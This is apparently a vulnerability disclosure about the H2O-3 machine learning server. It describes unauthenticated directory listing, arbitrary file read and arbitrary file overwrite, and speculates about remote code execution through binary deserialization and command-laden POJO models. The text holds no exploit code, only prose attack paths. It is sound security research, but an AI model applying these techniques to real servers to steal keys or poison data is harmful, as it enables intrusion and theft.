H2O-3 is a low-code tool that abstracts away most of the details of creating a machine learning model. It is the most popular open source repository from h2o.ai with more than 500,000 downloads a month. Users either download the standalone .jar file and run the server or import the h2o library in Python or R and initialize the server with h2o.init().
H2O allows users to see the entire filesystem’s file and directory paths through their Typeahead API call.
H2O allows users to read any file on the system.
H2O allows users to overwrite any file on the filesystem.
Via these built-in vulnerabilities, attackers have a direct and stealthy path to stealing secure socket shell (SSH) keys, API keys, models, data and absolutely anything else that interests them on the H2O server. Through the file overwrite vulnerability, an attacker can cause a denial of service or poison datasets with malicious data.
The H2O maintainers were contacted multiple times about these vulnerabilities over the course of several months with no response.
One should note that there was no actual exploitation needed. H2O was (and is, at the time of this writing) insecure by design. Initially, we thought there must be some kind of warning in place in the H2O documentation that the tool is specifically designed to only be deployed to the localhost interface and never be exposed remotely. This would mostly mitigate all of these vulnerabilities as the user would only have access to files that they already have access to as a local user. This is not the case, however, as H2O implements various methods of authentication implying the server is designed to be used by multiple users. Additionally, there does not appear to be a safe way of running H2O from the h2o.jar file at all.
The H2O quickstart guide:
If one follows this guide and runs H2O from the h2o.jar file, they have exposed their entire file system to all remote computers on the network. Even specifying arguments such as: java -jar h2o.jar -ip 127.0.0.1 still exposes the server’s file system to the entire network. It seems the only safe way of running H2O is by using the programmatic interface and not overriding the bind_to_localhost argument in h2o.init().
A realistic attack path of an outsider exploiting this vulnerability on an average organization:
A realistic attack path of an outside attacker exploiting this vulnerability in a security-hardened organization is as follows:
We have noticed a couple patterns in the security research we’ve conducted on machine learning tools. One, overly permissive file system access is common. Two, sanitization during the loading of data and models is often overlooked. Both problems can lead to remote code execution and we feel there is strong potential for H2O to contain this vulnerability.
There are two likely paths to remote code execution. First, abuse of one of the many file save functions to either install a backdoor or overwrite a file used for remote login, such as SSH keys. H2O has many such functions that write remote user input to the disk. However, so far in our research there has usually been a constraint in the format of the output file. An example is the arbitrary file overwrite vulnerability above. This vulnerability writes a CSV formatted file rather than the raw user input which was parsed by the frame. There are many such file saving functions in H2O and further exploration should be performed to either confirm or deny any of these functions have the ability to write raw data to the disk remotely.
Second, a common issue in the machine learning world is the use of insecure model serialization formats. The widely used library Pickle, notable as PyTorch's default format for model weights, allows for the ability to execute arbitrary code when loading files.
H2O doesn’t use pickle, it uses a few custom model formats: MOJO, POJO, and binary. If the model can be payloaded with command injection then uploaded to H2O and used for inference, then we would have remote code execution.
MOJO (Model Object Optimized) models have the ability to be uploaded remotely to the server and used for inference but this model format is largely just model metadata along with the model weights. This makes it an unlikely injection target. The files included in a MOJO zip file can be seen below.
Binary models are an H2O-specific Java serialization format called Iced which can also be uploaded to the server and used for inference. This is the most likely candidate for code injection given the significant amount of Java deserialization attacks seen in the past. Although we were unsuccessful in injecting into these models through the time we had to investigate, this area of H2O security research warrants a deeper dive. Code injection in the binary model would directly lead to remote code execution.
Last, POJO models are Plain Old Java Objects. One can payload these models with code execution in a way that doesn’t affect the model’s ability to predict. Below is an example of forcing the model to run an arbitrary command before it prints it’s predictions:
While this is a useful attack as an unsuspicious attachment in a phishing email to a machine learning engineer, POJO models can’t be uploaded to the H2O server nor does a conversion into MOJO format keep the arbitrary code execution.